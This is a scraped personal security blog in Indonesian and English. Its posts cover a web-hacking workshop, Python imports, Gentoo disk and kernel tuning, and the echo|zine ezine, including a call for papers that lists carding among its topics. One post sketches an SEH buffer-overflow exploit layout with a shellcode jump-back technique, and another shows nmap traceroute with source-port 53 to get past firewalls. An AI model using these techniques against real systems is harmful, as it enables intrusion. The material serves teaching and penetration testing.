Berikut ini adalah materi yang gw pergunakan saat melakukan workshop/pelatihan web hacking. Ini adalah versi terakhir dari workshop terakhir yang gw lakukan, dan ini adalah materi basic-nya. Dikarenakan sudah gw format seperti buku jadi mungkin bisa disebut buku :).
Materi Basic ini meliputi:
1. Perkenalan Web Attack Vector (berbasis OWASP) dan untuk materi basic ini hanya XSS dan SQL injection yang di bahas menggunakan Aplikasi yang gw kembangkan sendiri.
2. DVWA (Damn Vulnerable Web Application) Walkthrough, berisi bagaimana mengeksploitasi 9 celah keamanan yang terdapat di aplikasi DVWA.
y3dips shares stories about life, family, hacking, computer security, and *nix.
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Thursday, January 31, 2013
Saturday, March 17, 2012
Limited Shellcode Space (SEH based BOF example)
Just as a quick note if i meet this situation again. During the creation of the exploits, and i want to put a shellcode and the space would not enough (e.g below 20 bytes), but there is still a space in front of the buffer (before address that overwrite SE handler) for example in seh based buffer overflow:
junk1= 'A'*500
junk2= 'A'*12
buffy= junk1 + nseh + seh + '\x90'*8 + junk2
So, we need to jump back at least before the shellcode, for example our shellcode are 200 bytes, the buffer will be
buffy = 'A'*300 + shellcode + nseh + seh + '\x90'*8 + junk2
we need to jump back at least 220 bytes, to land in junk1, so we need 'junk2' to make us Jump back. to do this we can use decrement CH register (1 = 256 bytes decrease from ECX), but before doing that after we doing POP, POP, RETN the pointer three places down in the stack, to get this memory address to ECX register, we need to do POP ECX, POP ECX, POP ECX, after that Jump to ECX and it will moves back 256 from the original POP, POP, RETN instructions land.
So, here what we are doing
Monday, April 26, 2010
Python Kungfu: Jurus mengeksekusi Module
Kali ini postingnya sedikit berbau programming :D, karena iseng2 aja dan lu.mayan daripada lu.manyun, dan sebelum kelupaan atau sebagai penginggat kalo nanti kelupaan, dan biar blog ini terliat ngupdate isinya dengan post, bukan komennya duank :PBerikut adalah beberapa Jurus untuk pengeksekusian module secara bertingkat pada python, ada beberapa cara untuk mengaksesnya sebagai contoh dari package Jurus berikut ini, anda dapat menggunakan beberapa cara :P
1. Meng-import modules secara individual dari package, sebagai contoh:
import Jurus.Monyet.tendangan
Dan akan me-load module ‘Jurus.Monyet.tendangan’. Kelemahannya adalah setiap kali menggunakannya harus menyebutkan lengkap nama jurusnya setiap kali di keluarkan.
Jurus.Monyet.tendangan.tanpabayang(putaran, tenaga, dayahancur)
2. Langsung meng-import "submodule" yaitu:
from Jurus.Monyet import tendangan
Hal ini sedikit mempersingkat kita untuk hanya menuliskan nama module,
tendangan.tanpabayang(putaran, tenaga, dayahancur)
3. Yang paling sering dipakai, tetapi memiliki cakupan terbatas (specific) adalah dengan meng-import fungsi/variabel secara langsung, sbb:
from Jurus.Monyet.tendangan import tanpabayang
dan bisa langsung di eksekusi:
tanpabayang(putaran, tenaga, dayahancur)
Mudah-mudahan bermanfaat.
Sedikit informasi juga, meskipun saat ini saya belum berhasil menginstall wx-py di snowleopard karena issue terhadap arsitektur 64 bit, serta beberapa cara agar versi 32 bit dapat di kompile, tetapi pada saat di import tetap saja gagal, karena berbagai hal, cara ribet yang mungkin di gunakan adalah menjalankan python dalam mode 32 bit ("export VERSIONER_PYTHON_PREFER_32_BIT=yes), jadi tinggal menunggu developer merilis versi terbaru-nya. Untuk Python IDE, saya sudah mencoba beberapa IDE, tetapi akhirnya menggunakan Eclipse dengan Pydev sebagai pluggins untuk Python programming.
Update
Module Wx, sukses di install untuk Native python milik MAC osx 2.6.1 (py2.6-apple), tetapi harus men-set env dan memaksa python berjalan di architechture 32 bit.
Untuk versi python dari port (2.6.5) , penggunakan tkinter untuk GUI programming gw rasa cukup bisa menutupi wxpython :D
versi 3x terlihat sudah stabil, hanya saja dukungan module belum begitu banyak, jadinya rollback ke 2.6.5
*images are taken from http://www.gnetixmedia.com/logos/python.png
Thursday, May 14, 2009
Dissapear but not Gone !
"To those who understand, I extend my hand. To the doubtful I demand, take me as I am. Not under your command, I know where I stand. I won't change to fit your plan, Take me as I am" - As I am - Dream Theater
Potongan lirik di atas gw persembahkan buat semua temen yang "concern" tentang blog ini, sebenarnya tidak begitu lama blog ini belum gw update, terakhir gw nulis pada 2 Mei lalu ( tepat 2 hari kelahiran Ali dan ultah Ibu tercinta). Jadi, intinya gw sedikit terharu dengan perhatian teman-teman yang menanyakan "Kok blognya ga ngupdate-ngupdate lagi Om/bos/mar/dips ?"
Baiklah, sebagai "intermezzo" maka posting kalo ini tujuannya buat klarifikasi, informasi, sama nutrisi buat keinginan nulis gw biar ga makin tumpul. Kebetulan 2 minggu kebelakang terjadi hal yang sangat menakjubkan dalam hidup gw, dan kebetulan juga sebagai seorang "pekerja" minggu belakangan ini jadual kerja sangat padat, sehingga lengkaplah sudah, "part time researcher" hanya tinggal seonggok keinginan di otak gw yang ternyata tidak bisa diajak kompromi dengan waktu dan kebutuhan fisik gw untuk istirahat.
Supaya posting ini gak terkesan nge-junk banget, maka berikut trik dari gw dalam melakukan traceroute menggunakan nmap (untuk keperluan mapping jaringan kala pentest net infrastructure), teknik ini sebenarnya untuk mengakali firewall yang melakukan blocking terhadap standard traceroute yang memanfaatkan UDP dengan nomor port tujuan dari 33434 - 33534, atau sebagian OS yang mengikutkan paket traceroute menggunakan ICMP request (echo request, tipe 8). Sebenarnya bisa juga menggunakan tcptraceroute, atau traceroute dengan opsi "-p", tetapi tetap saja paket data (datagram) yang dikirimkan sama, sehingga tidak berlaku untuk jenis firewall yang melakukan inspeksi lebih kepada paket yang di kirim. Selain itu pemilihan nmap lebih karena keluwesan opsi dukungan lainnya seperti "decoy", bypass check host dengan "-PN". Berikut gambaran dari cerita di atas :
Yes, way to go kiddo :) , sebenarnya banyak lagi jutsu-jutsu mantap yang bisa di gunakan dengan nmap, tetapi yang menarik adalah pernyataan dari fyodor bahwa dalam melakukan OS fingerprinting/scanning " Your best bet is to use numerous reconnaissance methods to explore a network, and don't trust any one of them". Ada satu kasus dalam ujicoba gw bahwa nmap secara pasti memberikan hasil 86% Os dari target adalah FreeBSD, padahal sesungguhnya windows server 2003, hal ini dikarenakan konfigurasi firewall, Os, open port, penghilangan banner dari service/aplikasi dsb, gw kasih trik untuk mendeteksi server windows, lakukan scan dengan opsi "-sU" untuk melakukan scanning port UDP yang terbuka khususnya port 135, 139, 445, dan banyak teknik lain yang bisa di kombinasikan.angel / # traceroute -p 443 www.very.seku.re
traceroute to www.very.sekure (212.19.2.1), 30 hops max, 60 byte packets
1 192.168.16.1 (192.168.16.1) 0.215 ms 0.215 ms 0.219 ms
2 199.57.68.161 (199.57.68.161) 72.277 ms 72.558 ms 72.987 ms
3 204.99.195.10 (204.99.195.10) 23.367 ms 45.063 ms 47.104 ms
4 some.isp.net (221.147.179.12) 22.612 ms 23.036 ms 45.306 ms
5 other.mama.isp.net (108.10.27.129) 47.765 ms 73.462 ms 101.273 ms
6 another.papa.isp.net (108.100.27.166) 253.139 ms 268.934 ms 296.479 ms
7 112.55.0.129 (112.55.0.129) 45.718 ms 24.767 ms 50.157 ms
8 224.1.165.130 (224.1.165.130) 22.423 ms * 28.496 ms
9 * * *
--- truncated --
30 * * *
angel / #
Dan berikut menggunakan nmap,
angel / # nmap -PN --traceroute --source-port 53 www.very.seku.re
Starting Nmap 4.85BETA8 ( http://nmap.org ) at 2009-05-13 10:50 UTC
Interesting ports on 212.19.2.1:
Not shown: 999 filtered ports
PORT STATE SERVICE
443/tcp open https
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 0.13 192.168.16.1
2 880.78 199.57.68.161
3 27.28 204.99.195.10
4 17.56 some.isp.net (221.147.179.12)
5 23.42 other.mama.isp.net (108.10.27.129)
6 751.83 another.papa.isp.net (108.100.27.166)
7 83.74 112.55.0.129
8 76.36 224.1.165.130
9 1328.03 212.19.2.1
Nmap done: 1 IP address (1 host up) scanned in 69.53 seconds
Di 2-3 hari terakhir ini gw sibuk mengupdate "partial" gentoo gw ke gnome terbaru "Gnome 2.26", dan seperti biasanya (hehehe), gw perlu waktu cukup lama untuk melakukan "stabilisasi sistem" disamping secara berbarengan terjadi ugrade Xorg dan python, sehingga satu tips/pesan dari gw apabila kalian menemukan kegagalan sistem atau sistem tidak berjalan sempurna setelah melakukan "partial" upgrade dan bukan merupakan kesalahan/bug dari paket atau "ebuild", jalankan "revdep-rebuild" dan "python-updater" (menginggat sebagian aplikasi Gnome saat ini di bangun dengan python).
Yah, mudah-mudahan sedikit sharing kolaborasi 2 minggu terakhir ini dapat menghibur :).
Gambar adalah milik http://stephen60.wordpress.com
Friday, August 08, 2008
echo|zine issue 19 dirilis

======= 080808 ---|
08-08-08, "sebuah angka yang mungkin bagi sebagian orang dianggap keramat, angka ajaib, atau angka keberuntungan dan sebagainya"
Tetapi, hal itu tidak berlaku bagi kami, angka ini lebih kepada "kutukan", setelah kami memutuskan untuk menerbitkan issue 15 pada 06-06-06, kemudian di perkuat dengan rilis issue ke 17 satu tahun kemudian pada tanggal 07-07-07.Ya, ya, ya sebuah Call for paper (CFP) telah memperkuat kedudukan 08-08-08 untuk menjadi hari lahirnya/terbitnya issue ke 19 kami.
"Kutukan" ini berarti sangat baik bagi kami, karena setidaknya dalam 1 tahun minimal kami haruslah merilis 1 buah issue ("yang mungkin kutukan ini bisa terpatahkan di tahun 2013 - az001")
Bulan ini juga adalah bulan kemerdekaan nusantara yang ke 63 tahun, dan sebelum terlambat, maka kami mengucapkan selamat ulang tahun kepada nusantara, lupakan sejenak hingar-bingar dan gegap gempita pencalonan pemimpin daerah yang dihiasi wajah para artis, marilah kita kenang sejenak perjuangan para pahlawan kita,dan mulailah bangkitkan semangat untuk memerdekakan diri kita dari segala bentuk penjajahan. Terutama penjajahan dari Kebodohan!
======= Kabar Echo? ---|
"1 bulan lagi Echo akan berusia 5 tahun, mudah-mudahan semua yang echo berikan walaupun sedikit dapat bermanfaat bagi komunitas underground di Indonesia." - staff
Ditahun yang kelima ini kami kembali berbenah. Ya, ditahun inilah berbagai urusan dunia nyata semakin membuat kami menjauh dari dunia underground, beberapa staff bahkan menambah panjang daftar staff yang sudah berkeluarga, di tahun 2008 ini
sudah 2 orang staff yang melepas status sendirinya, dan kemungkinan 2 orang staff lagi juga akan melepaskan status sendirinya di sisa tahun 2008 ini. Inilah siklus hidup yang tidak bisa kita hindari. sehingga "idealisme" terkadang terdengar sayup-sayup..
Dan disinilah kami mencoba mempertahankan "idealisme" kami.
Staff echo yang jumlahnya dapat dihitung jari pun, seiring waktu berkurang. Berkurang? Tidak secara jumlah (kuantitas) tetapi lebih kepada kontribusi nyata (kualitas), Ya, tidak ada yang salah dengan itu, setiap staff memiliki komitmen untuk bertahan atau tersapu menghilang, dan komitmen itu pulalah satu-satunya hal yang mempersatukan. Saat komitmen mulai mengendur, maka saat itulah berkontribusi akan terasa sulit. Bukan, bukan hanya usia yang menjadi penghalang, masih banyak lagi, karena hidup itu misteri dan hal itu yang menyebabkan hidup ini indah.
Dan (sekali lagi) kami disini (kali ini) untuk memastikan bahwa echo akan bertahan!
======= issue #19 ---|
Issue kali ini dibuka dengan sebuah pseudo-random yang ditulis oleh anonymous, pada kesempatan kali ini anonymous secara tajam menyoroti berbagai kejadian di seputar komunitas, terbentuknya sebuah kompetisi ?, serta bagaimana menjadi yang terbaik. Dilanjutkan dengan penjabaran sebuah kegiatan yang diberi nama "idsecconf2008", yaitu sebuah artikel yang berisi proposal rancangan kegiatan
konferensi komunitas keamanan teknologi informasi se-nusantara, yang nantinya diharapkan dapat membangkitkan gairah para penggiat keamanan teknologi informasi, khususnya komunitas underground.
Dua buah artikel yang membahas bidang keilmuan kriptografi menghiasi issue kali ini, dimulai dengan sebuah artikel dari mamasexy yang membahas tentang Digital signature, artikel inipun disertai kode yang ditulis dengan bahasa pemrograman java. Dilanjutkan oleh x-diamond1 dengan sebuah artikel berjudul "cryptography : Simple a-symetrik algorithm", yang juga didukung dengan barisan kode perl sebagai pelengkapnya. Pada issue kali ini pula, kami menampilkan 2 buah "profile" yang berisikan biodata dari 2 individu yang cukup dikenal di kalangan underground dan keamanan praktis. Dimulai dengan cybertank, yang merupakan salah seorang staff kecoak elektronik, lalu lirva32, yang merupakan salah seorang staff echo yang sampai sekarang masih menjaga idealismenya dan aktif di komunitas.
Artikel "whats goin on echo forums" kali ini akan di tukangi oleh az001, menginggat berbagai kesibukan yang dihadapi oleh anonymous-co-editor yang biasanya menulis rubrik ini. Kali ini issue yang sangat hangat adalah beberapa "room" yang dianggap melanggar peraturan oleh penyedia layanan hosting dan bandwidth dan berakibat seluruh sub-domain echo.or.id tidak dapat diakses, serta beberapa bahasan menarik dari forum juga ikut menghiasi artikel/rubrik ini.
Dibidang keilmuan keamanan, diisi 4 buah artikel, dimulai dengan sebuah artikel berjudul "Bailiwicked DNS Attack (Cache Poisoning)" yang di tulis oleh Cyberheb, menjelaskan tentang celah pada protokol DNS yang ditemukan oleh Dan Kamiansky dan menjadi perbincangan hangat di komunitas keamanan baru-baru ini, kemudian sebuah artikel dari y3dips yang membahas mengenai sebuah
program berbasiskan bahasa pemrograman python, bernama Scapy, program yang sudah sangat terkenal dikalangan underground ini bahkan dijadikan module yang ampuh untuk membuat exsploit yang portabel, Scapy juga sangat membantu untuk belajar memahami kinerja protokol/jaringan,bahkan mempermudah kita menciptakan peralatan hacking.
Issue kali ini ditutup dengan 2 buah artikel pendek yang dirangkum dalam Hacker`s logbook, artikel pertama yang di tuliskan oleh az001, mengajarkan kita bagaimana memanfaatkan wget sebagai content fuzzer, teknik ini sangat efektif dikarenakan hampir disetiap mesin linux/unix yang tersebar di internet terinstall wget, kemudian di sisi berlawanan adalah sebuah artikel dari lirva32 yang mengajak kita untuk mengamankan webserver yang kita miliki dengan cara menginstall sebuah firewall untuk aplikasi web yaitu mod_security.
Selebihnya, selamat menikmati sajian kali ini :)
y3dips,
Founder ECHO.or.id
======= Table of Contents ---|
01. Introduction .................................................. y3dips
02. Pseudo-random .............................................. anonymous
03. id-sec-conf-2008 ........................................... echo|stff
04. Digital Signature secara gampangnya ......................... mamasexy
05. cryptography : Simple a-symetrik algorithm ................ x-diamond1
06. Prophile on CyberTank
Prophile on lirva32 ....................................... echo|staff
07. Whats goin on echo forum ....................................... az001
08. Bailiwicked DNS Attack (Cache Poisoning) .................... Cyberheb
09. Scapy: obrak-abrik paket data ................................. y3dips
10. Hackers Logbook
wget sebagai content fuzzer .................................... az001
Lindungi Asset Web Server Dengan Mode Security ............... lirva32
======== Shoutz ---|
- Jim Geovedi & theday .. selamat menempuh hidup baru dan semoga keberkahan
dan kebahagiaan selalu mengalir
- Generasi muda dunia underground Indonesia, "ayo bangkit"
======== Contact ---|
Editor-in-chief & co-ed : anonymous@echo.or.id
Submissions : ezine@echo.or.id
Commentary : ezine@echo.or.id
Echo Diplomatic Squadron : echostaff@echo.or.id
URI : http://ezine.echo.or.id
echo|zine issue 19, 08/08/08. ISSN IDUN-CARE
Copyright (c) 2008 echo|zine. All right reversed.
echo|zine issue 19 -- dari staff (contributors), oleh staff (lazy editors),
untuk SEMUA (You! YES, YOU!)
*- $e19dot001dottxt - echo|zine - issue#19 - 080808 -*
Monday, July 14, 2008
Performa lambat pada Gentoo (solved)
Baiklah, sebenarnya masalah ini sudah cukup lama, tepatnya sejak aku memutuskan untuk mengupgrade secara berkala venom yang masih bersistem operasikan Gentoo 2007.0 ke Gentoo 2008.0. Sejak itulah perubahan performa secara significant cukup terasa khususnya apabila melakukan multitasking dan multiprocess di system ini dan lebih spesifik lagi apabila melakukan aktifitas baca/tulis ke hardisk (khususnya dalam jumlah besar, waktu yang lama dan melibatkan cache, kerja processor, spare memori dsb), sebagai contoh: saat mengkopikan file sebesar 1GB dari flashdisk ke hardisk akan mengakibatkan processor bekerja hingga 100%, memaksa aplikasi yang lain menjadi tidak bisa diakses secara sempurna (pemutar musik, memutar lagu tersendat-sendat).Cukup lama bagiku untuk melakukan troubleshooting permasalahan ini, mulai dari melakukan inspeksi pada penggunaan virtual memory dan membatasinya di kernel, lalu kemungkinan hal ini diakibatkan salah konfigurasi parameter processor, dan setting processor pada kernel telah aku lakukan, dan benar, hal ini meningkatkan kinerja processor dan virtual memori, tetapi ternyata tetap tidak signifikan mengatasi permasalahan performa ini (saat dihadapkan dengan kegiatan tulis/baca ke disk/cd-rom/removable media)
Aku masih terpaku bahwa penyebab hal ini adalah kemungkinan "dual processor" yang kau miliki tidak secara maksimal digunakan oleh system, dan untuk itu aku telah meng-optimasi dual processor yang aku miliki agar berjalan sebagaimana mestinya, dan benar saja kinerja dual-processor milikku semakin meningkat, tetapi sayangnya akan tidak berdaya terhadap permasalahan tulis/baca ke disk/cd-rom/removable media.
Sampai akhirnya hari ini aku berkesimpulan pasti ada yang salah dengan performa hardisk yang aku miliki,kemudian sampailah aku kesebuah artikel untuk meningkatkan performa IDE device menggunakan hdparm.
Hdparm is a tool that allows you to set IDE device settings. This includes things such as DMA modes, transfer settings and various other settings that can help improve the speed of your hard disks and CDROMsDan akhirnya hal ini menyadarkan aku bahwa aku tidak pernah melakukan pemeriksaan terhadap settingan baca/tulis ke disk, pertama-tama lakukan pemeriksaan disk kita (/dev/hda), aku pernah sekali berpikir mengapa disk yang kumiliki dikenali dengan hd bukan sd (sata)
These settings are not enabled by default, so you will probably want to enable them
venom ~ # hdparm -i /dev/hdakemudian lakukan benchmarking kecepatan caching dan buffering
/dev/hda:
Model=HITACHI HTS541680J9SA00, FwRev=SB2IC7EP, SerialNo=SB2241SGJ3SN9E
Config={ HardSect NotMFM HdSw>15uSec Fixed DTR>10Mbs }
RawCHS=16383/16/63, TrkSize=0, SectSize=0, ECCbytes=4
BuffType=DualPortCache, BuffSize=7516kB, MaxMultSect=16, MultSect=16
CurCHS=16383/16/63, CurSects=16514064, LBA=yes, LBAsects=156301488
IORDY=on/off, tPIO={min:120,w/IORDY:120}, tDMA={min:120,rec:120}
PIO modes: pio0 pio1 pio2 pio3 pio4
DMA modes: mdma0 mdma1 mdma2
UDMA modes: udma0 udma1 udma2 udma3 udma4 *udma5
AdvancedPM=yes: mode=0x80 (128) WriteCache=enabled
Drive conforms to: ATA/ATAPI-7 T13 1532D revision 1: ATA/ATAPI-2,3,4,5,6,7
* signifies the current active mode
venom ~ # hdparm -tT /dev/hdaterlihat waktu buffering sangat lambat sekali, dan aku rasa memang hal inilah yang menyebabkan prosesor bekerja mati-matian untuk menjaga proses baca/tulis, sekarang kita liat info parameter hardisk yang dimiliki
/dev/hda:
Timing cached reads: 144 MB in 2.00 seconds = 71.96 MB/sec
Timing buffered disk reads: 4 MB in 3.38 seconds = 1.18 MB/sec
venom ~ # hdparm /dev/hdaDan terlihat bahwa IO_support yang ter-set untuk 16 bit (here are ther real problems), apalagi saat kucoba untuk menyalakan dukungan DMA maka akan mendapati error, sehingga optimasi yang dilakukan diantaranya adalah men-set dukungan IO untuk 32 bit sync (c3),set Xfer mode ke udma (X69), set unmasking (u1), meng-enable Read look-ahead (A1), serta mengenable write-caching (W1)
/dev/hda:
multcount = 16 (on)
IO_support = 0 (default)
16-bit)
unmaskirq = 0 (off)
using_dma = 0 (off)
keepsettings = 0 (off)
readonly = 0 (off)
readahead = 256 (on)
geometry = 16383/255/63, sectors = 156301488, start = 0
venom ~ #
venom boot # hdparm -A1 -u1 -c3 -X69 -W1 -m16 /dev/hdabaiklah, semua telah tersetting, sekarang aku lakukan kembali benchmarking
/dev/hda:
setting 32-bit IO_support flag to 3
setting multcount to 16
setting unmaskirq to 1 (on)
setting using_dma to 1 (on)
HDIO_SET_DMA failed: Operation not permitted
setting xfermode to 69 (UltraDMA mode5)
setting drive read-lookahead to 1 (on)
setting drive write-caching to 1 (on)
multcount = 16 (on)
IO_support = 3 (32-bit w/sync)
unmaskirq = 1 (on)
using_dma = 0 (off)
look-ahead = 1 (on)
write-caching = 1 (on)
venom boot # hdparm -tT /dev/hdadan terlihat satu hasil yang cukup significant baik waktu caching dan buffering, tetapi tidak cukup memuaskan. Untuk membuat parameter ini selalu di gunakan saat komputer menyala, maka tambahkan parameter ini ke file konfigurasi hdparm di /etc/conf.c/hdparm,
/dev/hda:
Timing cached reads: 1596 MB in 2.00 seconds = 798.47 MB/sec
Timing buffered disk reads: 12 MB in 3.48 seconds = 3.45 MB/sec
hda_args="-A1 -d1 -u1 -c3 -X69 -W1 -m16"
dan pastikan service hdparm selalu menyala setiap booting dengan menggunakan perintah "rc-update add hdparm default"
Karena hasil yang belum maksimal (dikarenakan DMA belum diset) maka aku melakukan sedikit pencarian di google dan menemukan artikel menarik tentang isu yang di miliki oleh Intel Corporation 82801GBM/GHM
a). There was an issue concerning the Intel Corporation 82801GBM/GHM (ICH7 Family) Sata IDE Controller (rev 02) working in concert with the TSSTCorp CD/DVDW TS-L632D. DMA could not be enabled on /dev/hdc, resulting in slow performance of the CD/DVD drive. Attempts to enable dma using hdparm resulted in:Dan kemudian melakukan kompile kernel kembali, anda dapat lebih mudah melakukannya dengan aplikasi "genkernel"
/dev/hdc
setting using_dma to 1 (on)
HDIO_SET_DMA failed: Operation not permitted
using_dma = 0 (off)
(after considerable consternation, I finally found a solution for this).
..in -Device Drivers --> ATA/ATAPI/MFM/RLL support -->
disable: < > Enhanced IDE/MFM/RLL disk/cdrom/tape/floppy support" (all of the subcategories will also disappear from the list).
..verify under - Serial ATA (prod) and Parallel ATA (experimental) drivers -->
ensure that this is on: < * > Intel PATA MPIIX support (it should also work fine if it's a module).
#genkernel --menuconfig --boorloader=grub all
Dan, jangan lupa untuk merubah parameter di grub, untuk path dari "/dev/hda/" ke "/dev/sda" sebelum anda melakukan restart, karena disinilah kita akan mengembalikan deteksi hardisk murni ke SATA dengan kompilasi yang kita lakukan
Setelah restart, coba lakukan benchmarking kembali, dan hasil yang di dapatkan sangat memuaskan serta semua masalah yang selama ini aku rasakan telah teratasi (saat ini dipikiranku adalah, "default" kernel parameter khususnya bagian device driver untuk disk-lah yang menyebabkan hal ini terjadi sejak melakukan upgrading ke 2008.0 dan kernel)
venom ~ # hdparm -tT /dev/sdaUntuk melakukan setting parameter, kita sudah harus menggunakan sdparm, bukan hdparm, karena akan menghasilkan error pembacaan parameter.
/dev/sda:
Timing cached reads: 2364 MB in 2.00 seconds = 1183.32 MB/sec
Timing buffered disk reads: 64 MB in 3.06 seconds = 20.89 MB/sec
venom ~ # hdparm /dev/sdaok, thats all folk, semoga sedikit banyak bisa membantu, khususnya bagi pengguna Gentoo yang merasakan performa yang menurun setelah melakukan upgrading system atau kernel.
/dev/sda:
IO_support = 0 (default)
16-bit)
HDIO_GET_UNMASKINTR failed: Inappropriate ioctl for device
HDIO_GET_DMA failed: Inappropriate ioctl for device
HDIO_GET_KEEPSETTINGS failed: Inappropriate ioctl for device
readonly = 0 (off)
readahead = 256 (on)
geometry = 9729/255/63, sectors = 156301488, start = 0
venom ~ # sdparm /dev/sda
/dev/sda: ATA HITACHI HTS54168 SB2I
Read write error recovery mode page:
AWRE 1
ARRE 0
PER 0
Caching (SBC) mode page:
WCE 1
RCD 0
Control mode page:
SWP 0
venom ~ # sdparm -a /dev/sda
/dev/sda: ATA HITACHI HTS54168 SB2I
Read write error recovery mode page:
AWRE 1
ARRE 0
TB 0
RC 0
EER 0
PER 0
DTE 0
DCR 0
RRC 0
COR_S 0
HOC 0
DSOC 0
WRC 0
RTL 0
Caching (SBC) mode page:
IC 0
ABPF 0
CAP 0
DISC 0
SIZE 0
WCE 1
MF 0
RCD 0
DRRP 0
WRP 0
DPTL 0
MIPF 0
MAPF 0
MAPFC 0
FSW 0
LBCSS 0
DRA 0
NV_DIS 0
NCS 0
CSS 0
Control mode page:
TST 0
TMF_ONLY 0
D_SENSE 0
GLTSD 1
RLEC 0
QAM 0
QERR 0
RAC 0
UA_INTLCK 0
SWP 0
ATO 0
TAS 0
AUTOLOAD 0
BTP -1
ESTCT 30
good luck
images are taken from here
Saturday, June 28, 2008
Using microcode_ctl saves our day
Ok, here`s the The microcode_ctl utility is a companion to the IA32 microcode driver written by Tigran Aivazian. The utility has two uses: The microcode update is volatile and needs to be uploaded on each system boot i.e. it doesn't reflash your cpu permanently, reboot and it reverts back to the old microcode
- it decodes and sends new microcode to the kernel driver to be uploaded to Intel IA32 processors. (Pentium Pro, PII, PIII, Pentium 4, Celeron, Xeon etc - all P6 and above, which does NOT include pentium classics). It also supports processors of the x86_64 architecture.
- it signals the kernel driver to release any buffers it may hold
Then, i wanna implement this to my gentoo. First, we need to check whether its already build or set as module in my kernel (the advantage of using a module is that it's loaded to do the update and then unloaded automatically afterward)
$ sudo cat /usr/src/linux/.config | grep CONFIG_MICROCODEok, sounds good, Now we need to install the microcode_ctl and the database file (.dat),
CONFIG_MICROCODE=m
CONFIG_MICROCODE_OLD_INTERFACE=y
#emerge microcode-ctlcheck dmesg output, if u found somethin like this "IA-32 Microcode Update Driver: v1.14a
#/etc/init.d/microcode_ctl start
#rc-update add microcode_ctl defaultNow you can check your dual processor working load (did they share? :P). How about mine? yes it works perfectly, especially to " signalling
images are property of http://www.treehugger.com
Wednesday, June 11, 2008
Tunning Gentoo; hardcore series
Berikut adalah inti dari diskusi gw dengan the_hydra (thx man :P) seharian ini (wekz, ketauan dah kalo kerjanya chatting :P), permasalahan ini gw rasakan sejak gw menggunakan kernel baru dan environtment baru di gentoo gw (2008.0 beta 2 upgradble version). Permasalahannya adalah jeleknya manajemen memori dan kerja prosesor yang gw rasakan dan akhirnya kita troubleshoot bareng, dan karena ini Adapun intinya adalah gw memodifikasi parameter kernel gw, dengan menambahkan entry dibawah ini ke /etc/sysctl.conf (penjelasan tiap paramater harap dicari sendiri) dan ingat ini adalah konfigurasi untu komputer lenovo R60 dengan kernel 2.6.25-gentoo-r4 #1 SMP (dan jangan berharap hasil yang sama untuk mesin dengan arsitektur dan kernel versi lain)
vi /etc/sysctl.conf
#im tunning the VM
vm.swappiness = 20
vm.overcommit_memory = 1
vm.laptop_mode = 1
kemudian permasalahan memori selesai (bisa menggunakan "cat /proc/meminfo", "top" atau "free -m" untuk melakukan pemeriksaan), lalu berlanjut kepermasalahan penggunaan prosessor oleh user/process yang berujung kepada limitasi proses untuk user (sepertinya hal ini perlu saya diskusikan di milis resmi gentoo, tapi nanti dah) yang setelah di lihat "unlimited" dibandingkan dengan default set pada debian/ubuntu
untuk gentoo
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 16237
max locked memory (kbytes, -l) 32
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 8192
cpu time (seconds, -t) unlimited
max user processes (-u) unlimited
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited
sedang debian/ubuntu
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 16379
max locked memory (kbytes, -l) 32
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 8192
cpu time (seconds, -t) unlimited
max user processes (-u) 16379
virtual memory (kbytes, -v)
unlimited file locks (-x) unlimited
sehingga saya harus melakukan setting "echo ulimit -u 16237 > .bashrc" untuk tiap user (Sedikit ada human error saat melakukan ujicoba pada user root yang sudah di limit dengan user biasa dan terlambat untuk disadari).
Selanjutnya checking kernel configuration juga di lakukan serta terakhir melakukan compiling ulang untuk menyalakan PREEMPT (ingat, bukan PREEMPT_VOLUNTARY), kemudian mengkompile ulang, 3 langkah tersebut sudah cukup ampuh (untuk saat ini) menangani kemungkinan DOS akibat user/aplikasi.
ok enjoy(tm) .. sampai jumpa di chat berkualitas lainnya :P
gambar diambil tanpa ijin dari http://images.smithandnoble.com
Tuesday, June 10, 2008
echo zine issue 19 CFP
Dear all (you! yes you!), Baik yang pros atau kons terhadap setiap rilis issue gratis yang dikeluarkan oleh echo dalam bentuk majalah elektronik secara rutin.Rilis issue ke 19 kali ini akan merupakan rilis kedua dari volume 6 dan sekaligus menunjukkan bahwa ini adalah tahun ke-enam echo menerbitkan majalah elektroniknya sejak tahun pertama di tahun 2003.Dan ternyata, 3 bulan sudah berlalu sejak kami merilis beberapa artikel kontroversial terkait dengan suasana di dunia nyata pada issue ke 18 yang lalu. Untuk itulah kami para editor (co-editor) merilis Call for paper untuk issue 19, dengan harapan apa yang kami cita-citakan (banyak munculnya penulis berkualitas dengan tulisan berkualitas) akan terwujud di rilis kali ini.
Jadi berhenti berkoar-koar dan tuliskan artikel kamu dan kirim ke sini! (proof of concept are highly required)
so , heres the joy
echo|zine, Vol 6 Issue 19Kami tunggu kontribusi anda untuk Komunitas (Bangsa) ini!
* /CALL /FOR /PAPERS * /CALL /FOR /PAPERS * /CALL /FOR /PAPERS *
* /CALL /FOR /PAPERS * /CALL /FOR /PAPERS * /CALL /FOR /PAPERS *
Hail Hackers !!!!
Kami, echo|staff, yang sedang mempersiapkan echo|zine, Vol 6 Issue 19
mengajak Anda semua untuk dapat berpartisipasi dengan mengirimkan
artikel seputar:
* hacking
* security
* phreaking
* forensics
* carding
* electronics
* cryptography
* local underground news
Panduan menulis artikel dapat dibaca kembali pada echo|zine, Vol 3
Issue 11 [http://ezine.echo.or.id/ezine11/echo11-003.txt]
Para kontributor dihimbau untuk mengirimkan artikel sedini mungkin
untuk menghindari konflik pemilihan topik dan memudahkan editor
memandu dan mengoreksi artikel. Selain itu, artikel yang dikirimkan
diharapkan bukan merupakan artikel terjemahan/saduran dan belum pernah
dimuat di media lain.
Kami juga menerima usulan interview untuk komunitas, lengkapnya silahkan
